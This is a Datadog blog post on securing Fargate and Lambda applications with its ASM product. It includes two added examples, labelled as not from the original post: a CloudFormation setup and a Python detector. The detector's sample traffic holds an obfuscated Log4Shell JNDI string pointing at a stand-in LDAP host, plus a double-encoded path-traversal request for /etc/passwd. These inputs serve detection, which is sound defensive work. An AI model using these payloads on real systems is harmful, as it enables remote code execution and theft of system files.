Secure Serverless Applications With Datadog ASM | Datadog

Secure serverless applications with Datadog ASM

Authors: Jordan Obey, Karishma Asthana, Sourabh Katti

Published: December 12, 2022

The popularity of serverless architectures continues to grow as organizations seek ease of scalability and to eliminate the need to provision and manage infrastructure. In fact, in our most recent State of Serverless report, we found that more than half of our customers have adopted serverless technologies offered by Azure, Google Cloud, and AWS.

While serverless architectures shift responsibility for the underlying servers, operating systems, and runtimes to the cloud provider, teams remain responsible for application-level security and must still protect against attacks such as command and SQL injection, cross-site scripting (XSS), denial of service (DoS), and more. Securing serverless applications is uniquely challenging because they are highly distributed and comprise many ephemeral, stateless components. Functions need to be secured not only at the code level but per invocation as well, which further complicates application security because functions are often invoked millions or billions of times a month. This expanded attack surface gives attackers more opportunities to compromise data and exploit vulnerable applications. AWS helped address it by extending Amazon Inspector to scan AWS Lambda functions, so you can identify vulnerabilities at the Lambda layer.

To further help overcome challenges to serverless security, Datadog Application Security Management (ASM) now includes support for applications built on AWS Fargate and AWS Lambda serverless technologies. Datadog ASM works alongside Application Performance Monitoring (APM), which means you can monitor traffic for security threats without any additional agents or instrumentation. ASM monitors the traffic of your serverless application to generate Security Signals and provide insight into application-level attacks attempting to exploit code-level vulnerabilities. You can now monitor and manage the security of your applications just as easily as managing their performance and reliability.

In this post, we'll look at how ASM addresses the challenges of securing serverless architectures: enabling security monitoring on all of your functions without extra instrumentation, identifying damaging exploits and the exact function or task they hit, and using code-level insight to remediate quickly.

Seamlessly enable security monitoring on all of your functions

As serverless applications and APIs grow in size and complexity, more opportunities arise for bad actors to take advantage of their vulnerabilities. Serverless applications often consist of a large number of functions and services, each of which provides a potential entry point for an attack and contributes to a wider overall attack surface. Additionally, Lambda functions can be triggered by many types of events from different services, such as Amazon S3 object events, DynamoDB Streams records, and Amazon SNS notifications, so not all of a function's input arrives over HTTP. These factors make security monitoring hard to implement because of the sheer number of individual functions you need to enable it on, which drives up operational overhead.

Datadog ASM uses the same tracing libraries as Datadog APM, which means that if you have already instrumented your service or application with APM, you simply need to update to the most recent APM tracing library and enable ASM to start collecting application security data. Once enabled, ASM monitors requests across your Lambda functions and Fargate-hosted applications and automatically detects and notifies you of security threats targeting them.
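As an added example that is not from the original post or from Datadog's own documentation, the CloudFormation fragment below shows what "enable ASM" amounts to for the Fargate case: the Datadog Agent runs as a sidecar in the same task, and the application container, already instrumented with the APM tracer, gets one extra environment variable, `DD_APPSEC_ENABLED=true`. The service, env and version values, the container images, the secret ARN, and the `TaskExecutionRole` resource are placeholders assumed to exist elsewhere in your template. Lambda, which the post says is still in beta, is configured differently and is not shown.

```yaml
# Added example, not from the original post. CloudFormation fragment for an
# ECS Fargate task that runs the Datadog Agent as a sidecar and turns ASM on
# in the application container. Placeholders/assumptions: the image names,
# service/env/version values, the secret ARN, and TaskExecutionRole (assumed
# to be defined elsewhere in the template).
Resources:
  IpaddrApiTask:
    Type: AWS::ECS::TaskDefinition
    Properties:
      Family: ipaddr-api
      NetworkMode: awsvpc            # required on Fargate; containers share localhost
      RequiresCompatibilities: [FARGATE]
      Cpu: "512"
      Memory: "1024"
      ExecutionRoleArn: !GetAtt TaskExecutionRole.Arn   # must be allowed to read the secret
      ContainerDefinitions:
        - Name: datadog-agent
          Image: public.ecr.aws/datadog/agent:7
          Essential: true
          Environment:
            - { Name: ECS_FARGATE, Value: "true" }       # run the Agent in Fargate mode
            - { Name: DD_SITE, Value: datadoghq.com }
            - { Name: DD_APM_ENABLED, Value: "true" }    # accept traces from the tracer on :8126
          Secrets:
            - Name: DD_API_KEY
              ValueFrom: arn:aws:secretsmanager:us-east-1:123456789012:secret:datadog-api-key  # placeholder
        - Name: ipaddr-api
          Image: 123456789012.dkr.ecr.us-east-1.amazonaws.com/ipaddr-api:1.4.2   # placeholder
          Essential: true
          PortMappings:
            - ContainerPort: 8080
          Environment:
            - { Name: DD_SERVICE, Value: ipaddr-api }
            - { Name: DD_ENV, Value: prod }
            - { Name: DD_VERSION, Value: "1.4.2" }
            - { Name: DD_TRACE_ENABLED, Value: "true" }
            # The one setting that turns APM instrumentation into ASM monitoring.
            # Omitted or "false", the same tracer sends performance data only.
            - { Name: DD_APPSEC_ENABLED, Value: "true" }
```

Because the task uses the `awsvpc` network mode, the tracer in `ipaddr-api` reaches the Agent at its default `localhost:8126` without any further configuration; the only change between "APM only" and "APM plus ASM" is the last environment variable.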

Identify damaging serverless exploits and any impacted function or task

Because every invocation of a Lambda function represents an opportunity for a security breach, identifying attacks exploiting Lambda functions requires visibility into each invocation. Without visibility into the full scope of a request, it can be difficult to distinguish between legitimate and malicious traffic, increasing the time it takes to detect an attack and giving an attacker more time to successfully exploit a vulnerability.

Datadog ASM operates at runtime and monitors on an invocation basis. It includes comprehensive out-of-the-box detection rules that automatically flag common security threats and code-level vulnerabilities in your serverless application, such as Log4Shell and Local File Inclusion (LFI) attack attempts. When an attack behavior matches a detection rule, Datadog will generate a Security Signal notifying you of the attack.

Datadog ASM centralizes Security Signals, which provide contextualizing details such as the IP address an attack originated from.
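To make the per-invocation detection described above concrete, here is an added, deliberately simplified illustration (not Datadog's rule set or code) of what a rule-based inspection of one invocation's user-controlled fields looks like: each field is normalized to strip common evasions (double URL-encoding, Log4j `${lower:j}ndi`-style lookup obfuscation), then matched against a handful of constructed patterns for Log4Shell and Local File Inclusion attempts, producing a signal that carries the function name, the location of the payload, and the source IP. The sample requests, rule patterns, and function names other than `ipaddr-local-time` (which appears in the post) are constructed for this example.

```python
"""Simplified, rule-based inspection of serverless request data.

Added illustration only: the patterns and sample requests below are
constructed for this example and are NOT Datadog's detection rules.
They show the kind of per-invocation matching an in-app security layer
performs to turn a Log4Shell or LFI attempt into a signal with context
(function, location of the payload, source IP).
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote


@dataclass
class Request:
    """One invocation's HTTP-shaped input (constructed for this example)."""
    function: str          # Lambda function or Fargate service handling it
    method: str
    path: str
    query: dict
    headers: dict


# (rule id, pattern, human-readable attack name). Hypothetical rule set.
RULES = [
    ("log4shell-jndi", re.compile(r"\$\{\s*jndi\s*:", re.I),
     "Log4Shell (JNDI lookup in user-controlled string)"),
    ("lfi-traversal", re.compile(r"\.\.[/\\]"),
     "Local File Inclusion (path traversal)"),
    ("lfi-sensitive-file", re.compile(r"/etc/(?:passwd|shadow)|boot\.ini", re.I),
     "Local File Inclusion (sensitive file name)"),
]


def normalize(value: str, rounds: int = 3) -> str:
    """Undo common evasions before matching.

    - Repeated URL-decoding (bounded) catches %252F-style double encoding.
    - Log4j lookup tricks such as ${lower:j}ndi or ${::-j}ndi are collapsed
      to the literal they resolve to, so the JNDI rule sees plain 'jndi'.
    """
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    for _ in range(rounds):
        stripped = re.sub(r"\$\{(?:lower|upper):([^{}]*)\}", r"\1", value, flags=re.I)
        stripped = re.sub(r"\$\{::-([^{}]*)\}", r"\1", stripped)
        if stripped == value:
            break
        value = stripped
    return value


def inspect(req: Request) -> list:
    """Run every rule over every user-controlled field of one invocation."""
    fields = [("path", req.path)]
    fields += [(f"query.{k}", v) for k, v in req.query.items()]
    fields += [(f"header.{k.lower()}", v) for k, v in req.headers.items()]
    signals = []
    for location, raw in fields:
        value = normalize(raw)
        for rule_id, pattern, attack in RULES:
            hit = pattern.search(value)
            if hit:
                signals.append({
                    "function": req.function,
                    "rule": rule_id,
                    "attack": attack,
                    "location": location,
                    "matched": hit.group(0),
                    # Client address as seen at the edge; constructed header.
                    "source_ip": req.headers.get("X-Forwarded-For", "unknown"),
                })
    return signals


# Constructed sample traffic: one benign call, one Log4Shell probe hidden in
# the User-Agent with lookup obfuscation, one double-encoded LFI attempt.
SAMPLE_REQUESTS = [
    Request("ipaddr-local-time", "GET", "/time", {"ip": "203.0.113.7"},
            {"User-Agent": "curl/8.0", "X-Forwarded-For": "203.0.113.7"}),
    Request("ipaddr-local-time", "GET", "/time", {"ip": "203.0.113.8"},
            {"User-Agent": "${${lower:j}ndi:ldap://198.51.100.9/a}",
             "X-Forwarded-For": "198.51.100.9"}),
    Request("report-export", "GET", "/export",
            {"file": "..%252F..%252F..%252Fetc%252Fpasswd"},
            {"User-Agent": "Mozilla/5.0", "X-Forwarded-For": "192.0.2.44"}),
]


def run_all(requests=SAMPLE_REQUESTS) -> list:
    """Inspect each invocation and return the combined list of signals."""
    return [s for req in requests for s in inspect(req)]


if __name__ == "__main__":
    for s in run_all():
        print(f"[{s['rule']}] {s['function']} {s['location']} "
              f"from {s['source_ip']}: {s['matched']!r}")
```

Two points the example is meant to show: the benign request produces nothing, so the signal stream stays actionable, and the obfuscated payloads are only caught because normalization runs before matching. Real in-app detection has to make the same decision on every invocation, which is why the post stresses per-invocation visibility rather than sampled or aggregate monitoring.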

Another challenge to securing serverless architectures is the ephemeral nature of Lambda functions and Fargate containers, which scale up and down with usage, so the instance that handled a malicious request may be gone by the time you investigate. Datadog ASM builds on APM's distributed tracing to follow a request as it propagates across your serverless application, which lets you identify the most urgent attack attempts as they occur. Within ASM, you can pivot from a Security Signal directly to its related traces and immediately see the exact Lambda functions or Fargate tasks that were impacted.

Use deep code-level insight for fast threat remediation

The ephemerality and volume of Lambda functions and Fargate containers also makes it difficult to determine the scope of an attack and how best to approach remediation. For example, you may have been notified of an attack, but without visibility into what other parts of your service were impacted or what code-level vulnerability was exploited, it won’t be clear what next steps to take. Datadog ASM helps speed up the mean time to remediate (MTTR) by pinpointing exactly where the vulnerability exists, the attack’s impact and blast radius, and the overall context around the root cause of the attack—eliminating arduous triage and investigations.

With Datadog ASM Attack Flows, you can see how an attack propagated across functions to understand its blast radius and gain context on how best to remediate. Security Signals provide the exact function where the vulnerability is, the detection rule that was triggered, the malicious input, and advice on how to remediate. In the screenshot below, you can see that an attack was attempted on a Lambda function called ipaddr-local-time and that the signal calls for immediate action.

Datadog ASM attack flows enable you to see how attacks propagate across a service.

Secure your serverless applications with Datadog ASM today

Datadog Application Security Management provides insight into application-level attacks throughout your serverless architecture, enabling you to understand an attack’s blast radius and remediate the breach quickly. Currently, ASM’s serverless support is generally available for AWS Fargate, with support for AWS Lambda in private beta. If you are a Datadog APM serverless user, sign up for the private beta for early access to ASM for Lambda.

In addition to ASM, Datadog includes a suite of other security tools to help you improve your security posture, such as Cloud SIEM, Cloud Security Posture Management, and Cloud Workload Security. To learn more about Datadog Security, check out our documentation.

If you aren't already using Datadog, sign up today for a 14-day free trial.